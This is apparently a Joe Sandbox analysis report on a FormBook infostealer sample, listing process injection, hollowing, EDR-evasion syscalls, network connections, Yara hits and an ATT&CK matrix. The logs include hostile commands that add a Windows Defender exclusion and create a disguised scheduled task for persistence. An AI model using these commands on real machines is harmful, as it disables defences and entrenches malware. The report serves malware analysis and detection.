Code function: 13_2_00AC79E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_00AC79E1

Source: C:\Users\user\Desktop\890983726372673.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.67.218.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.62.22 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.23.184.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.64.152.166 80	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe"
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0x1C9A4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0x1C9A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0x18EA56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0x18EA4F2	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 4056	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 4056	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 4056	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 9E0000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 440000			Jump to behavior

Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpCC47.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: explorer.exe, explorer.exe, 0000000D.00000002.2542142612.00000000009E0000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000002.2544883306.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1318558972.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 0000000A.00000000.1318056915.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2543669261.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: RegSvcs.exe, 00000009.00000002.1386926023.0000000003580000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2542142612.00000000009E0000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
Source: explorer.exe, 0000000A.00000002.2544883306.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1318558972.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\890983726372673.exe	Queries volume information: C:\Users\user\Desktop\890983726372673.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Queries volume information: C:\Users\user\AppData\Roaming\mZanCtInfW.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\890983726372673.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	512 Process Injection	1 Rootkit	1 Credential API Hooking	331 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	212 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Abuse Elevation Control Mechanism	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	4 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 890983726372673.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
890983726372673.exe